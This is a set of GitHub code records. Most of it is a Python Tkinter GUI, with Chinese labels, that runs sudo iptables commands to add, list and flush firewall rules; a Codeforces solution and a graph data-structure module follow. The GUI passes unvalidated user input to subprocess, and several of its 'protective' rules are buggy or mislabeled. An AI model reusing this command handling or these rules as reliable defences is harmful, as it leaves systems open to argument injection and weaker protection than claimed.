Button(self.frame_top, text=\"帮助\", bg=\"lightblue\", width=15, height=2,\n command=self.open_help)\n self.iptables_button.pack(anchor=E, side='right')\n self.indus_firewall_Label = Label(self.frame_top, text=\"Iptables firewall\", bg=\"lightyellow\", width=123,\n height=2)\n self.indus_firewall_Label.pack(side='left', anchor=CENTER)\n self.frame_down = Frame(self.iptables_window, borderwidth=2)\n self.frame_down.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.add_suggest_button = Button(self.frame_down, text=\"添加推荐规则\", bg=\"lightblue\", width=50, height=2,\n command=self.add_suggest_rule)\n self.add_suggest_button.pack(anchor=N, side='top', pady=10)\n self.rule_input = Text(self.frame_down, width=50, height=2)\n self.rule_input.pack(side='top', anchor=N)\n self.add_self_button = Button(self.frame_down, text=\"添加自定义规则\", bg=\"lightblue\", width=50, height=2,\n command=self.add_self_rules)\n self.add_self_button.pack(anchor=N, side='top')\n self.flush_all_button = Button(self.frame_down, text=\"删除所有规则\", bg=\"lightblue\", width=50, height=2,\n command=self.flushall)\n self.flush_all_button.pack(anchor=N, side='bottom', pady=10)\n self.rule_manage_button = Button(self.frame_down, text=\"指定规则管理\", bg=\"lightblue\", width=50, height=2,\n command=self.rule_manipulate)\n self.rule_manage_button.pack(anchor=N, side='bottom')\n self.choose_table = LabelFrame(self.frame_down, text=\"选择表\", width=50, height=2)\n self.choose_table.pack(anchor=N, side='top', pady=5)\n TABLES = [('Filter', 1), ('NAT', 2), ('Raw', 3), ('Mangle', 4)]\n self.table_num = IntVar()\n self.table_num.set(1)\n for TABLE, num in TABLES:\n b = Radiobutton(self.choose_table, text=TABLE, variable=self.table_num, value=num)\n b.pack(side='left', anchor=N, padx=10)\n\n def add_suggest_rule(self):\n suggest_rule_window = Toplevel(self.iptables_window)\n SUGGEST_RULE_window = SUGGEST_RULE_GUI(suggest_rule_window)\n SUGGEST_RULE_window.set_SUGGEST_RULE_window()\n suggest_rule_window.mainloop()\n\n def rule_manipulate(self):\n self.num = self.table_num.get()\n rule_window = Toplevel(self.iptables_window)\n RULE_window = MY_RULE_GUI(rule_window, self.num)\n RULE_window.set_RULE_window()\n RULE_window.show_table_rules()\n rule_window.mainloop()\n\n def open_help(self):\n help_window = Toplevel(self.iptables_window)\n HELP_window = 
MY_HELP_GUI(help_window)\n HELP_window.set_HELP_window()\n help_window.mainloop()\n\n def add_self_rules(self):\n rules_content = self.rule_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n if len(rules) > 1:\n try:\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n except:\n showwarning('警告', '您输入的规则不正确')\n\n else:\n showwarning('警告', '输入的规则不能为空')\n\n def flushall(self):\n for chain in iptc.Table(iptc.Table.FILTER).chains:\n chain.flush()\n for chain in iptc.Table(iptc.Table.NAT).chains:\n chain.flush()\n for chain in iptc.Table(iptc.Table.RAW).chains:\n chain.flush()\n for chain in iptc.Table(iptc.Table.MANGLE).chains:\n chain.flush()\n rules_content1 = 'sudo iptables -F'.strip().replace(\"\\n\", \"\")\n rules_content2 = 'sudo iptables -X'.strip().replace(\"\\n\", \"\")\n rules1 = rules_content1.split()\n rules2 = rules_content2.split()\n subprocess.check_output(rules1)\n subprocess.check_output(rules2)\n showinfo('notice', '所有规则均删除')\n\n\nclass MY_HELP_GUI():\n def __init__(self, help_window):\n self.help_window = help_window\n\n def set_HELP_window(self):\n self.help_window.title(\"帮助文档\") # 窗口名\n self.help_window.geometry('640x420+670+360')\n self.frame_top = Frame(self.help_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.text_Scroll = Scrollbar(self.frame_top)\n self.text_Scroll.pack(side='right', fill='y')\n self.help_input = Text(self.frame_top, yscrollcommand=self.text_Scroll.set, width=70, height=60, font=(\"newspaper\", 12))\n self.help_input.pack(side='right', fill=BOTH)\n self.help_input.insert(END, '1.iptables中的“四表五链”及“堵通策略”A.“四表”是指,iptables的功能——filter, '\n 'nat, mangle, raw.filter, \\n控制数据包是否允许进出及转发(INPUT、OUTPUT、FORWARD),'\n '\\n可以控制的链路有input, forward, outputnat, 控制数据包中地址转换,\\n可以控制的链路有prerouting,'\n ' input, output, postroutingmangle,修改数据包中的原数据,\\n可以控制的链路有prerouting,'\n ' input, forward, output, postroutingraw,控制nat表中连接追踪机制的启用状况,'\n '\\n可以控制的链路有prerouting, output注:在centos7中,还有security表,不过这里不作介绍'\n '常用命令:-A 追加规则-->iptables -A INPUT\\n-D 删除规则-->iptables -D INPUT 1(编号)\\n-R 修改规则-->iptables -R '\n 'INPUT 1 -s 192.168.12.0 -j DROP 取代现行规则,顺序不变(1是位置)\\n-I 插入规则-->'\n 'iptables -I INPUT 1 --dport 80 -j ACCEPT 插入一条规则,原本位置上的规则将会往后移动一个顺位'\n '\\n-L 查看规则-->iptables -L INPUT 列出规则链中的所有规则'\n '\\n-N 新的规则-->iptables -N allowed 定义新的规则\\n通用参数:'\n '\\n-p 协议 例:iptables -A INPUT -p tcp'\n '\\n-s源地址 例:iptables -A INPUT -s 192.168.1.1'\n '\\n-d目的地址 例:iptables -A INPUT -d 192.168.12.1'\n '\\n-sport源端口 例:iptables -A INPUT -p tcp --sport 22'\n '\\n-dport目的端口 例:iptables -A INPUT -p tcp --dport 22'\n '\\n-i指定入口网卡 例:iptables -A INPUT -i eth0'\n '\\n-o指定出口网卡 例:iptables -A FORWARD -o eth0\\n-j 指定要进行的处理动作\\n常用的ACTION:\\nDROP:丢弃'\n '\\nREJECT:明示拒绝\\nACCEPT:接受\\nSNAT基于原地址的转换\\nsource--指定原地址 '\n ' \\n 比如我们现在要将所有192.168.10.0网段的IP在经过的时候全都转换成172.16.100.1这个假设出来的外网地址:'\n '\\niptables -t nat -A POSTROUTING -s 192.168.10.0/24 -j SNAT --to-source 172.16.100.1(外网有效ip)'\n '\\n这样,只要是来自本地网络的试图通过网卡访问网络的,都会被统统转换成172.16.100.1这个IP.'\n '\\nMASQUERADE(动态伪装)--家用带宽获取的外网ip,就是用到了动态伪装'\n '\\niptables -t nat -A POSTROUTING -s 192.168.10.0/24 -j MASQUERADE'\n '\\nDNAT目标地址转换'\n '\\ndestination-指定目标地址'\n '\\niptables -t nat -A PREROUTING -d 192.168.10.18 -p tcp --dport 80 -j DNAT --to-destination 172.16.100.2'\n '\\n10.18访问80端口转换到100.2上'\n '\\nMASQUERADE:源地址伪装'\n '\\nREDIRECT:重定向:主要用于实现端口重定向'\n '\\nMARK:打防火墙标记的'\n '\\nRETURN:返回 在自定义链执行完毕后使用返回,来返回原规则链。\\n链 (chain)'\n 
'\\n每个表都有自己的一组内置链,可以对链进行自定义,这样就可以建立一组规则,'\n '\\nfilter表中的input、output和forward链'\n '\\n匹配(match)'\n '\\n每个iptables规则都包含一组匹配以及一个目标,iptables匹配指的是数据包必须匹配的条件,只有当'\n '\\n数据包满足所有的匹配条件时,iptables才能根据由该规则的目标所指定的动作来处理该数据包'\n '\\n匹配都在iptable的命令行中指定'\n '\\nsource--匹配源ip地址或网络'\n '\\ndestination (-d)--匹配目标ip地址或网络'\n '\\nprotocol (-p)--匹配ip值'\n '\\nin-interface (-i)--流入接口(例如,eth0)'\n '\\nout-interface (-o)--流出接口'\n '\\nstate--匹配一组连接状态'\n '\\nstring--匹配应用层数据字节序列'\n '\\ncomment--在内核内存中为一个规则关联多达256个字节的注释数据'\n '\\n目标(target)'\n '\\niptables支持一组目标,用于数据包匹配一条规则时触发一个动作'\n '\\nACCEPT--允许数据包通过'\n '\\nDROP--丢弃数据包,不对该数据包做进一步的处理,对接收栈而言,就好像该数据包从来没有被接收一样'\n '\\nLOG--将数据包信息记录到syslog'\n '\\nREJECT--丢弃数据包,同时发送适当的响应报文(针对TCP连接的TCP重要数据包或针对UDP数据包的ICMP端口不可达消息)\\nRETURN--在调用链中继续处理数据包')\n\n\nclass MY_RULE_GUI():\n def __init__(self, rule_window, table_num):\n self.show_list = [[], [], [], []]\n self.rule_window = rule_window\n self.table_num_choose = table_num\n self.table_choose = None\n self.table_name = None\n\n def set_RULE_window(self):\n self.rule_window.title(\"rule management\") # 窗口名\n self.rule_window.geometry('1040x320+370+360')\n self.frame_top = Frame(self.rule_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.rules_select = Frame(self.frame_top)\n self.rules_select.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.rules_Scroll = Scrollbar(self.rules_select)\n self.rules_Scroll.pack(side='right', fill='y')\n self.rule_printout = Listbox(self.rules_select, yscrollcommand=self.rules_Scroll.set, width=200, height=5)\n self.rule_printout.pack(side='right', fill=BOTH)\n self.rules_Scroll.config(command=self.rule_printout.yview)\n self.flushtable_button = Button(self.frame_top, text=\"删除表内规则\", bg=\"lightblue\", width=20, height=2,\n command=self.flushtable)\n self.flushtable_button.pack(anchor=W, side='left', padx=50)\n self.delete_rule_button = Button(self.frame_top, text=\"删除此条规则\", bg=\"lightblue\", width=20, height=2,\n command=self.delete_rule)\n self.delete_rule_button.pack(anchor=W, side='left', padx=50)\n\n def show_table_rules(self):\n if self.table_num_choose == 1:\n iptc.Table(iptc.Table.FILTER).refresh()\n self.table_choose = iptc.Table(iptc.Table.FILTER)\n self.table_name = 'filter'\n if self.table_num_choose == 2:\n iptc.Table(iptc.Table.NAT).refresh()\n self.table_choose = iptc.Table(iptc.Table.NAT)\n self.table_name = 'nat'\n if self.table_num_choose == 3:\n iptc.Table(iptc.Table.RAW).refresh()\n self.table_choose = iptc.Table(iptc.Table.RAW)\n self.table_name = 'raw'\n if self.table_num_choose == 4:\n iptc.Table(iptc.Table.MANGLE).refresh()\n self.table_choose = iptc.Table(iptc.Table.MANGLE)\n self.table_name = 'mangle'\n\n print(self.table_choose)\n print(type(self.table_choose))\n for chain in self.table_choose.chains:\n for rule in chain.rules:\n rule_print = ''\n rule_print += str(chain.name)\n rule_print += (\"Rule\" + \"proto:\" + str(rule.protocol) + \"src:\" + str(rule.src) + \"dst:\" + str(rule.dst)\n + \"in:\" + str(rule.in_interface) + \"out:\" + str(rule.out_interface))\n rule_print += str(rule.target.name)\n self.show_list[0].append(rule_print)\n self.show_list[1].append(str(chain.name))\n self.show_list[2].append(chain)\n self.show_list[3].append(rule)\n print(self.show_list[0])\n print(self.show_list[1])\n print(self.show_list[2])\n print(self.show_list[3])\n for item in self.show_list[0]:\n self.rule_printout.insert(END, item)\n\n def flushtable(self):\n for chain in self.table_choose.chains:\n chain.flush()\n\n 
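# Drop the cached (display text, chain name, chain, rule) bookkeeping lists and empty the listbox so the UI matches the now-flushed table.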
self.show_list[0].clear()\n self.show_list[1].clear()\n self.show_list[2].clear()\n self.show_list[3].clear()\n self.rule_printout.delete(0, 'end')\n showinfo('NOTICE', 'table is empty now')\n\n def delete_rule(self):\n rule_index = self.rule_printout.index(ACTIVE) + 1\n\n rules_content = ('sudo iptables -t %s -D %s %d' % (\n self.table_name, self.show_list[1][rule_index - 1], rule_index)).strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.rule_printout.delete(ACTIVE)\n chain = self.show_list[2][rule_index - 1]\n chain.delete_rule(self.show_list[3][rule_index - 1])\n print(self.show_list)\n self.show_list[1].pop(rule_index - 1)\n self.show_list[0].pop(rule_index - 1)\n self.show_list[2].pop(rule_index - 1)\n self.show_list[3].pop(rule_index - 1)\n print(self.show_list)\n showinfo('NOTICE', '规则已删除')\n\n\nclass SUGGEST_RULE_GUI():\n def __init__(self, suggest_rule_window):\n self.suggest_rule_window = suggest_rule_window\n\n def set_SUGGEST_RULE_window(self):\n global auto_nat_color, deny_forward_color, deny_ping_color, deny_scan_color, deny_flooding_color, drop_fragments_color, \\\n drop_XMAS_color, drop_null_color, drop_multirst_color, drop_invalid_color\n self.suggest_rule_window.title(\"Rules recommend\") # 窗口名\n self.suggest_rule_window.geometry('680x400+670+360')\n self.frame_top = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n\n self.frame_top = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.POSTROUTING_button = Button(self.frame_top, text=\"跨局域网转发\", bg=auto_nat_color, width=20, height=2,\n command=self.post_masquerade)\n self.POSTROUTING_button.pack(anchor=W, side='left')\n self.deny_forward_button = Button(self.frame_top, text=\"禁止转发\", bg=deny_forward_color, width=20, height=2,\n command=self.deny_forward)\n self.deny_forward_button.pack(anchor=W, side='left')\n self.deny_ping_button = Button(self.frame_top, text=\"禁止ping\", bg=deny_ping_color, width=20, height=2,\n command=self.deny_ping)\n self.deny_ping_button.pack(anchor=W, side='left')\n self.exit_button = Button(self.frame_top, text=\"exit\", bg=\"LightSalmon\", width=20, height=2,\n command=self.exit)\n self.exit_button.pack(anchor=W, side='left')\n self.frame_2 = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_2.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n\n self.frame_2_1 = Frame(self.frame_2, relief=RAISED, borderwidth=1)\n self.frame_2_1.pack(padx=2, pady=2, ipady=2, ipadx=2, side='left')\n self.frame_funcions_input1_ip = Frame(self.frame_2_1, borderwidth=1)\n self.frame_funcions_input1_ip.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.dstip_Label = Label(self.frame_funcions_input1_ip, text=\"dst ip\", bg=\"lightyellow\", width=10, height=2)\n self.dstip_Label.pack(side='left', anchor=CENTER)\n self.dstip_input = Text(self.frame_funcions_input1_ip, width=18, height=2)\n self.dstip_input.pack(side='left', anchor=CENTER)\n self.sendip_Label = Label(self.frame_funcions_input1_ip, text=\"send to ip\", bg=\"lightyellow\", width=10,\n height=2)\n self.sendip_Label.pack(side='left', anchor=CENTER)\n self.sendip_input = Text(self.frame_funcions_input1_ip, width=18, height=2)\n self.sendip_input.pack(side='left', anchor=CENTER)\n\n self.frame_2_2 = Frame(self.frame_2_1, borderwidth=1)\n 
self.frame_2_2.pack(padx=2, pady=2, ipady=2, ipadx=2)\n self.dstp_Label = Label(self.frame_2_2, text=\"dst port\", bg=\"lightyellow\", width=10,\n height=2)\n self.dstp_Label.pack(side='left', anchor=CENTER)\n self.dstp_input = Text(self.frame_2_2, width=18, height=2)\n self.dstp_input.pack(side='left', anchor=CENTER)\n self.sendp_Label = Label(self.frame_2_2, text=\"send to port\", bg=\"lightyellow\", width=10,\n height=2)\n self.sendp_Label.pack(side='left', anchor=CENTER)\n self.sendp_input = Text(self.frame_2_2, width=18, height=2)\n self.sendp_input.pack(side='left', anchor=CENTER)\n self.set_proxy_button = Button(self.frame_2, text=\"设置代理\", bg=\"lightblue\", width=15, height=3,\n command=self.set_proxy)\n self.set_proxy_button.pack(anchor=E, side='right')\n\n self.frame_3 = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_3.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.whitelist_input = Text(self.frame_3, width=18, height=2)\n self.whitelist_input.pack(side='left', anchor=CENTER)\n self.whitelist_button = Button(self.frame_3, text=\"添加白名单\", bg=\"lightblue\", width=15, height=1,\n command=self.add_whitelist)\n self.whitelist_button.pack(side='left', anchor=CENTER)\n self.blacklist_input = Text(self.frame_3, width=18, height=2)\n self.blacklist_input.pack(side='left', anchor=CENTER)\n self.blacklist_button = Button(self.frame_3, text=\"添加黑名单\", bg=\"lightblue\", width=15, height=1,\n command=self.add_blacklist)\n self.blacklist_button.pack(side='left', anchor=CENTER)\n self.frame_4 = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_4.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.deny_scan_button = Button(self.frame_4, text=\"防止端口扫描\", bg=deny_scan_color, width=20, height=2,\n command=self.deny_scan)\n self.deny_scan_button.pack(side='left', anchor=CENTER)\n self.deny_flooding_button = Button(self.frame_4, text=\"防止泛洪攻击\", bg=deny_flooding_color, width=20, height=2,\n command=self.deny_flooding)\n self.deny_flooding_button.pack(side='left', anchor=CENTER)\n self.frame_5 = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_5.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.deny_fragments_button = Button(self.frame_5, text=\"丢弃碎片数据包\", bg=drop_fragments_color, width=14, height=1,\n command=self.drop_fragments)\n self.deny_fragments_button.pack(side='left', anchor=CENTER)\n self.deny_XMAS_button = Button(self.frame_5, text=\"丢弃异常XMAS\", bg=drop_XMAS_color, width=14, height=1,\n command=self.drop_XMAS)\n self.deny_XMAS_button.pack(side='left', anchor=CENTER)\n\n self.deny_null_button = Button(self.frame_5, text=\"丢弃null数据包\", bg=drop_null_color, width=14, height=1,\n command=self.drop_null)\n self.deny_null_button.pack(side='left', anchor=CENTER)\n self.deny_multi_rst_button = Button(self.frame_5, text=\"丢弃重复RST请求\", bg=drop_multirst_color, width=14, height=1,\n command=self.deny_multirst)\n self.deny_multi_rst_button.pack(side='left', anchor=CENTER)\n self.deny_invalid_button = Button(self.frame_5, text=\"丢弃无效数据包\", bg=drop_invalid_color, width=14, height=1,\n command=self.drop_invalid)\n self.deny_invalid_button.pack(side='left', anchor=CENTER)\n\n def exit(self):\n try:\n ans = askyesno(title='Warning', message='are you sure to exit?')\n if ans:\n self.suggest_rule_window.destroy()\n else:\n return\n except:\n print('can not close')\n\n def post_masquerade(self):\n global auto_nat_color\n rules_content1 = 'sudo iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -d 192.168.1.0/24 
-p tcp -j MASQUERADE'.strip().replace(\n \"\\n\", \"\")\n rules_content2 = 'sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE'.strip().replace(\"\\n\", \"\")\n rules1 = rules_content1.split()\n rules2 = rules_content2.split()\n subprocess.check_output(rules1)\n subprocess.check_output(rules2)\n self.POSTROUTING_button.configure(bg=\"LightSkyBlue\")\n auto_nat_color = 'Wheat'\n\n def deny_forward(self):\n global deny_forward_color\n rules_content = 'sudo iptables -A FORWARD -j REJECT'.strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_forward_button.configure(bg=\"LightSkyBlue\")\n deny_forward_color = 'Wheat'\n\n def deny_ping(self):\n global deny_ping_color\n rules_content = 'sudo iptables -A FORWARD -p icmp -m icmp --icmp-type echo-request -j DROP'.strip().replace(\n \"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_ping_button.configure(bg=\"LightSkyBlue\")\n deny_ping_color = 'Wheat'\n\n def set_proxy(self):\n dstip = self.dstip_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n dstp = self.dstp_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n sendip = self.sendip_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n sendp = self.sendp_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n rules_content = ('sudo iptables -t nat -A PREROUTING -d %s -dport %s -p tcp -j DNAT --to-destination %s:%s' % (\n dstip, dstp, sendip, sendp)).strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n showinfo('NOTICE', '代理已成功添加')\n\n def add_whitelist(self):\n whiteip = self.whitelist_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n rules_content = ('sudo iptables -t nat -A PREROUTING -s %s -p all -j ACCEPT' % whiteip).strip().replace(\"\\n\",\n \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n showinfo('NOTICE', '白名单已成功添加')\n\n def add_blacklist(self):\n blackip = self.blacklist_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n rules_content = ('sudo iptables -t filter -A FORWARD -s %s -p tcp -j DROP' % blackip).strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n showinfo('NOTICE', '黑名单已成功添加')\n\n def deny_scan(self):\n global deny_scan_color\n rules_content = 'sudo iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT'.strip().replace(\n \"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_scan_button.configure(bg=\"LightSkyBlue\")\n deny_scan_color = 'Wheat'\n\n def deny_flooding(self):\n global deny_flooding_color\n rules_content = 'sudo iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT'.strip().replace(\n \"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_flooding_button.configure(bg=\"LightSkyBlue\")\n deny_flooding_color = 'Wheat'\n\n def drop_fragments(self):\n global drop_fragments_color\n rules_content = 'sudo 
iptables -A FORWARD -p tcp ! --syn -m state --state NEW -j DROP'.strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_fragments_button.configure(bg=\"LightSkyBlue\")\n drop_fragments_color = 'Wheat'\n\n def drop_XMAS(self):\n global drop_XMAS_color\n subprocess.check_output(\n 'sudo iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP'.strip().replace(\"\\n\", \"\").split())\n subprocess.check_output(\n 'sudo iptables -A INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP'.strip().replace(\"\\n\", \"\").split())\n subprocess.check_output(\n 'sudo iptables -A INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP'.strip().replace(\"\\n\",\n \"\").split())\n self.deny_XMAS_button.configure(bg=\"LightSkyBlue\")\n drop_XMAS_color = 'Wheat'\n\n def drop_null(self):\n global drop_null_color\n rules_content = 'sudo iptables -A OUTPUT -p tcp --tcp-flags ALL NONE -j DROP'.strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_null_button.configure(bg=\"LightSkyBlue\")\n drop_null_color = 'Wheat'\n\n def drop_invalid(self):\n global drop_invalid_color\n subprocess.check_output(\n 'sudo iptables -A INPUT -m state --state INVALID -j DROP'.strip().replace(\"\\n\", \"\").split())\n subprocess.check_output(\n 'sudo iptables -A FORWARD -m state --state INVALID -j DROP'.strip().replace(\"\\n\", \"\").split())\n subprocess.check_output(\n 'sudo iptables -A OUTPUT -m state --state INVALID -j DROP'.strip().replace(\"\\n\", \"\").split())\n self.deny_invalid_button.configure(bg=\"LightSkyBlue\")\n drop_invalid_color = 'Wheat'\n\n def deny_multirst(self):\n global drop_multirst_color\n rules_content = 'sudo iptables -A INPUT -p tcp -m tcp --tcp-flags RST RST -m limit --limit 10/second --limit-burst 30 -j ACCEPT'.strip().replace(\n \"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_multi_rst_button.configure(bg=\"LightSkyBlue\")\n drop_multirst_color = 'Wheat'\n","repo_name":"wuguobeijing/StratosphereLinuxIPS-dev","sub_path":"tcpproxy/GUI_iptables.py","file_name":"GUI_iptables.py","file_ext":"py","file_size_in_byte":30224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"36856103951","text":"for _ in range(int(input())):\n n, k, q = map(int, input().split())\n a = [int(x) for x in input().split()]\n numways = 0\n streak = 0\n for i in range(n):\n if a[i] <= q:\n streak += 1\n else:\n streak = 0\n\n if streak >= k:\n numways += streak-k+1\n print(numways)","repo_name":"JaydenPahukula/competitive-coding","sub_path":"Codeforces/878/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"8434701994","text":"inf = float(\"inf\")\n\nclass GraphError(ValueError):\n pass\n\n\n# 邻接矩阵的实现\nclass Graph:\n def __init__(self, mat, unconn=1):\n # unconn服务于在构造图对象的时候可以通过参数为无关连的情况提供一个特殊值\n # 主要参数mat,表示出事的邻接矩阵,要求其是一个二维的表参数,\n # 提供图的基本构架,主要确定定点个数\n # 先确定是否合法,检测给定矩阵是否为方阵\n vnum = len(mat)\n # vnum:端点数\n for x in mat:\n if len(x) != vnum:\n # check if it is square\n raise ValueError(\"Argument for 'Graph'\")\n self._mat = [mat[i][:] for i in range(vnum)]\n self._unconn = unconn\n self._vnum = 
vnum\n\n    def vertex_num(self):\n        return self._vnum\n\n    def _invalid(self, v):\n        # valid vertex numbers are 0 .. vnum-1\n        return v < 0 or v >= self._vnum\n\n    def add_vertex(self):\n        raise GraphError(\"Adj_Matrix does not support 'add_vertex'\")\n\n    def add_edge(self, vi, vj, val=1):\n        if self._invalid(vi) or self._invalid(vj):\n            raise GraphError(str(vi) + ' or ' + str(vj) +\n                             \" is not a valid vertex.\")\n        self._mat[vi][vj] = val\n\n    def get_edge(self, vi, vj):\n        if self._invalid(vi) or self._invalid(vj):\n            raise GraphError(str(vi) + ' or ' + str(vj) +\n                             \" is not a valid vertex.\")\n        return self._mat[vi][vj]\n\n    def out_edges(self, vi):\n        if self._invalid(vi):\n            raise GraphError(str(vi) + \" is not a valid vertex.\")\n        return self._out_edges(self._mat[vi], self._unconn)\n\n    @staticmethod\n    def _out_edges(row, unconn):\n        edges = []\n        for i in range(len(row)):\n            if row[i] != unconn:\n                edges.append((i, row[i]))\n        return edges\n\n    def __str__(self):\n        return \"{\\n\" + \",\\n\".join(map(str, self._mat)) + \"\\n}\" \\\n               + \"\\nUnconnected: \" + str(self._unconn)\n\n# Adjacency-list implementation\n# More compact than the matrix for sparse graphs:\n# each vertex v's outgoing edges are stored in a list\n# whose elements have the form (end vertex, weight)\nclass GraphAL(Graph):\n    def __init__(self, mat=(), unconn=0):\n        vnum = len(mat)\n        for x in mat:\n            if len(x) != vnum:\n                raise ValueError(\"Argument for GraphAL\")\n        self._mat = [Graph._out_edges(mat[i], unconn)\n                     for i in range(vnum)]\n        self._vnum = vnum\n        self._unconn = unconn\n\n    def add_vertex(self):\n        self._mat.append([])\n        self._vnum += 1\n        return self._vnum - 1\n\n    def add_edge(self, vi, vj, val=1):\n        if self._vnum == 0:\n            raise GraphError(\"Cannot add edge to empty graph\")\n        if self._invalid(vi) or self._invalid(vj):\n            raise GraphError(str(vi) + ' or ' + str(vj) +\n                             \" is not a valid vertex.\")\n        row = self._mat[vi]\n        i = 0\n        while i < len(row):\n            if row[i][0] == vj:\n                self._mat[vi][i] = (vj, val)  # update the existing edge's weight\n                return\n            if row[i][0] > vj:\n                break\n            i += 1\n        self._mat[vi].insert(i, (vj, val))\n\n    def get_edge(self, vi, vj):\n        if self._invalid(vi) or self._invalid(vj):\n            raise GraphError(str(vi) + ' or ' + str(vj) +\n                             \" is not a valid vertex.\")\n        for i, val in self._mat[vi]:\n            if i == vj:\n                return val\n        return self._unconn\n\n    def out_edges(self, vi):\n        if self._invalid(vi):\n            raise GraphError(str(vi) + \" is not a valid vertex.\")\n        return self._mat[vi]\n\n\nclass StackUnderFlow(ValueError):\n    pass\n    # stack underflow\n\n# A stack implemented on top of a Python list\nclass SStack():\n    def __init__(self):\n        self._elems = []\n\n    def is_empty(self):\n        return self._elems == []\n\n    def top(self):\n        if self._elems == []:\n            raise StackUnderFlow(\"in SStack.top()\")\n        return self._elems[-1]\n\n    def push(self, elem):\n        self._elems.append(elem)\n\n    def pop(self):\n        if self._elems == []:\n            raise StackUnderFlow(\"in SStack pop()\")\n        return self._elems.pop()\n\n# Non-recursive (iterative) depth-first traversal\ndef DFS_graph(graph, v0):\n    vnum = graph.vertex_num()\n    visited = [0]*vnum\n    visited[v0] = 1\n    DFS_seq = [v0]\n    # visited marks seen vertices, DFS_seq records the visit order\n    st = SStack()\n    # a stack serves as the auxiliary data structure\n    st.push((0, graph.out_edges(v0)))  # push\n    while not st.is_empty():\n        i, edges = st.pop()\n        if i < len(edges):\n            v, e = edges[i]\n            st.push((i+1, edges))\n            if not visited[v]:\n                DFS_seq.append(v)\n                visited[v] = 1\n                st.push((0, graph.out_edges(v)))\n    return DFS_seq\n# Stack entries are (i, edges): edges is a vertex's adjacency list and i is the next index to try\n
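\n\n# Illustrative sanity check for the iterative DFS above; the tiny 3-vertex\n# graph and the _demo_dfs helper are made up for this example and were not\n# part of the original module.\ndef _demo_dfs():\n    # edges form the chain 0 -> 1 -> 2, so a traversal from 0 visits in order\n    demo = GraphAL([[0, 1, 0], [0, 0, 1], [0, 0, 0]], unconn=0)\n    assert DFS_graph(demo, 0) == [0, 1, 2]\n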
